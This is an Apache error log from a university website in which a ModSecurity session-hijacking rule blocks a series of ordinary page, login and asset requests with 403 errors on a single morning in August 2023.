[Mon Aug 28 08:22:53.570951 2023] [:error] [pid 38338] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv27cCo-f0AAJXCvvUAAAAJ"]
[Mon Aug 28 08:22:56.830755 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv28MCo-f0AAJX1kg0AAAAS"]
[Mon Aug 28 08:22:57.233215 2023] [:error] [pid 38338] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv28cCo-f0AAJXCvvYAAAAJ"]
[Mon Aug 28 08:23:03.265500 2023] [:error] [pid 38059] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv298Co-f0AAJSr24IAAAAO"]
[Mon Aug 28 08:23:08.092165 2023] [:error] [pid 38114] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv2-MCo-f0AAJTinjwAAAAE"]
[Mon Aug 28 08:23:08.255334 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2-MCo-f0AAJXyN6QAAAAM"]
[Mon Aug 28 08:23:09.440255 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv2-cCo-f0AAJX1khAAAAAS"]
[Mon Aug 28 08:23:09.580636 2023] [:error] [pid 38114] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2-cCo-f0AAJTinj0AAAAE"]
[Mon Aug 28 08:23:10.532040 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv2-sCo-f0AAJXyN6UAAAAM"]
[Mon Aug 28 08:23:10.775083 2023] [:error] [pid 38059] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2-sCo-f0AAJSr24MAAAAO"]
[Mon Aug 28 08:23:20.570879 2023] [:error] [pid 38059] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv3CMCo-f0AAJSr24UAAAAO"]
[Mon Aug 28 08:23:20.960234 2023] [:error] [pid 38114] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3CMCo-f0AAJTinj8AAAAE"]
[Mon Aug 28 08:23:23.200618 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv3C8Co-f0AAJX1khMAAAAS"]
[Mon Aug 28 08:23:23.692655 2023] [:error] [pid 38149] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3C8Co-f0AAJUFNcoAAAAA"]
[Mon Aug 28 08:23:41.886390 2023] [:error] [pid 38379] [client 125.166.221.156] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv3HcCo-f0AAJXrIsQAAAAP"]
[Mon Aug 28 08:25:18.050853 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv3fsCo-f0AAJSxY7EAAAAH"]
[Mon Aug 28 08:25:18.061344 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv3fsCo-f0AAJSr25MAAAAO"]
[Mon Aug 28 08:25:18.065750 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv3fsCo-f0AAJWfZOYAAAAI"]
[Mon Aug 28 08:25:18.076633 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJSxY7IAAAAH"]
[Mon Aug 28 08:25:18.082930 2023] [:error] [pid 38338] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv3fsCo-f0AAJXCvwQAAAAJ"]
[Mon Aug 28 08:25:18.091996 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv3fsCo-f0AAJSr25QAAAAO"]
[Mon Aug 28 08:25:18.101685 2023] [:error] [pid 37539] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv3fsCo-f0AAJKjaJ4AAAAG"]
[Mon Aug 28 08:25:18.116724 2023] [:error] [pid 38149] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJUFNdkAAAAA"]
[Mon Aug 28 08:25:18.141039 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv3fsCo-f0AAJSxY7MAAAAH"]
[Mon Aug 28 08:25:18.160109 2023] [:error] [pid 38386] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3fsCo-f0AAJXyN7kAAAAM"]
[Mon Aug 28 08:25:18.177102 2023] [:error] [pid 38389] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv3fsCo-f0AAJX1kh4AAAAS"]
[Mon Aug 28 08:25:18.183215 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv3fsCo-f0AAJSr25UAAAAO"]
[Mon Aug 28 08:25:18.186876 2023] [:error] [pid 38386] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv3fsCo-f0AAJXyN7oAAAAM"]
[Mon Aug 28 08:25:18.199911 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv3fsCo-f0AAJSxY7QAAAAH"]
[Mon Aug 28 08:25:18.203993 2023] [:error] [pid 38338] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv3fsCo-f0AAJXCvwUAAAAJ"]
[Mon Aug 28 08:25:18.211966 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv3fsCo-f0AAJWfZOcAAAAI"]
[Mon Aug 28 08:25:18.228862 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv3fsCo-f0AAJSxY7UAAAAH"]
[Mon Aug 28 08:25:18.235149 2023] [:error] [pid 38338] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv3fsCo-f0AAJXCvwYAAAAJ"]
[Mon Aug 28 08:25:18.239393 2023] [:error] [pid 37539] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv3fsCo-f0AAJKjaJ8AAAAG"]
[Mon Aug 28 08:25:18.254298 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv3fsCo-f0AAJWfZOgAAAAI"]
[Mon Aug 28 08:25:18.261033 2023] [:error] [pid 37539] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv3fsCo-f0AAJKjaKAAAAAG"]
[Mon Aug 28 08:25:18.293415 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv3fsCo-f0AAJSr25YAAAAO"]
[Mon Aug 28 08:25:18.298644 2023] [:error] [pid 38149] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv3fsCo-f0AAJUFNdoAAAAA"]
[Mon Aug 28 08:25:18.303565 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv3fsCo-f0AAJSxY7YAAAAH"]
[Mon Aug 28 08:25:18.453493 2023] [:error] [pid 38114] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv3fsCo-f0AAJTink8AAAAE"]
[Mon Aug 28 08:25:18.462839 2023] [:error] [pid 38059] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3fsCo-f0AAJSr25cAAAAO"]
[Mon Aug 28 08:25:18.463455 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv3fsCo-f0AAJXrIs0AAAAP"]
[Mon Aug 28 08:25:18.472532 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv3fsCo-f0AAJWfZOkAAAAI"]
[Mon Aug 28 08:25:18.538586 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv3fsCo-f0AAJXrIs4AAAAP"]
[Mon Aug 28 08:25:18.538809 2023] [:error] [pid 38059] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv3fsCo-f0AAJSr25gAAAAO"]
[Mon Aug 28 08:25:18.538841 2023] [:error] [pid 38338] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJXCvwcAAAAJ"]
[Mon Aug 28 08:25:18.564968 2023] [:error] [pid 38114] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv3fsCo-f0AAJTinlAAAAAE"]
[Mon Aug 28 08:25:18.566637 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv3fsCo-f0AAJKjaKEAAAAG"]
[Mon Aug 28 08:25:18.566930 2023] [:error] [pid 38389] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv3fsCo-f0AAJX1kh8AAAAS"]
[Mon Aug 28 08:25:18.611620 2023] [:error] [pid 38149] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv3fsCo-f0AAJUFNdsAAAAA"]
[Mon Aug 28 08:25:18.615118 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv3fsCo-f0AAJXrIs8AAAAP"]
[Mon Aug 28 08:25:18.615492 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv3fsCo-f0AAJKjaKIAAAAG"]
[Mon Aug 28 08:25:18.668200 2023] [:error] [pid 38389] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOv3fsCo-f0AAJX1kiAAAAAS"]
[Mon Aug 28 08:25:18.668256 2023] [:error] [pid 38386] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv3fsCo-f0AAJXyN7sAAAAM"]
[Mon Aug 28 08:25:18.677286 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv3fsCo-f0AAJXrItAAAAAP"]
[Mon Aug 28 08:25:18.698702 2023] [:error] [pid 38338] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJXCvwgAAAAJ"]
[Mon Aug 28 08:25:18.734471 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv3fsCo-f0AAJKjaKMAAAAG"]
[Mon Aug 28 08:25:18.734751 2023] [:error] [pid 38386] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOv3fsCo-f0AAJXyN7wAAAAM"]
[Mon Aug 28 08:25:18.734850 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv3fsCo-f0AAJXrItEAAAAP"]
[Mon Aug 28 08:25:18.757418 2023] [:error] [pid 38114] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv3fsCo-f0AAJTinlEAAAAE"]
[Mon Aug 28 08:25:18.758139 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv3fsCo-f0AAJXrItIAAAAP"]
[Mon Aug 28 08:25:18.770430 2023] [:error] [pid 38059] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv3fsCo-f0AAJSr25kAAAAO"]
